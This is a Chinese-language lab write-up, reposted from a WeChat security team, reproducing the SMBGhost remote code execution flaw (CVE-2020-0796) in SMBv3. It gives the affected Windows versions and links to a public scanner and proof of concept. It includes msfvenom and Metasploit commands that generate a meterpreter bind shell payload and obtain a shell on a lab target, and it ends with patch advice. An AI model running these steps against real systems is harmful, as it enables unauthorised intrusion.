CVE2020-0796 永恒之黑 漏洞复现

admin 2023年1月8日23:48:12评论71 views字数 1648阅读5分29秒阅读模式


00

前言

Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。
微软公布了在Server Message Block 3.0(SMBv3)中发现的“蠕虫型”预授权远程代码执行漏洞。
01

漏洞详情


漏洞介绍

Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协 议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

影响范围

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)


02

环境准备

攻击机:Kali Lunix 2020.1

ip : 192.168.44.130

靶机:Windows 10 Version 1903 for 32-bit Systems

ip :192.168.. 44.137

检测poc下载:https://github.com/ollypwn/SMBGhost/blob/master/scanner.py

CVE-2020-0796 "poc"下载: https://github.com/chompie1337/SMBGhost_RCE_PoC

03

漏洞复现


使用scanner.py  poc探测靶机是否存在CVE2020-0796漏洞

CVE2020-0796 永恒之黑 漏洞复现

使用msfvenom 生成正向链接木马获取shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b 'x00' -i 1 -f python

CVE2020-0796 永恒之黑 漏洞复现

启动msf控制端设置有效攻击载荷,并开启4444端口监听

 use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 4444 set rhost 192.168.44.137 run

CVE2020-0796 永恒之黑 漏洞复现

将生成的shellcode替换到exploit.py,注意buf改成USER_PAYLOAD

CVE2020-0796 永恒之黑 漏洞复现

执行poc

CVE2020-0796 永恒之黑 漏洞复现

由于poc不稳定,可能会出现physical read primitive failed!的错误,需要多试几次

CVE2020-0796 永恒之黑 漏洞复现

Msf收到响应信息

CVE2020-0796 永恒之黑 漏洞复现

输入shell反弹成功

CVE2020-0796 永恒之黑 漏洞复现

CVE2020-0796 永恒之黑 漏洞复现

参考:

https://www.freebuf.com/vuls/247422.html

04

预防与修复

  1. 从Windows Update更新,并确保安装最新的2020年3月份安全更新或累积更新。

  2. 前往微软官方网站,自行下载对应的补丁。


- End -



CVE2020-0796 永恒之黑 漏洞复现
微信扫码关注我们

原文始发于微信公众号(NS Demon团队):CVE2020-0796 永恒之黑 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月8日23:48:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE2020-0796 永恒之黑 漏洞复现https://cn-sec.com/archives/981438.html

发表评论

匿名网友 填写信息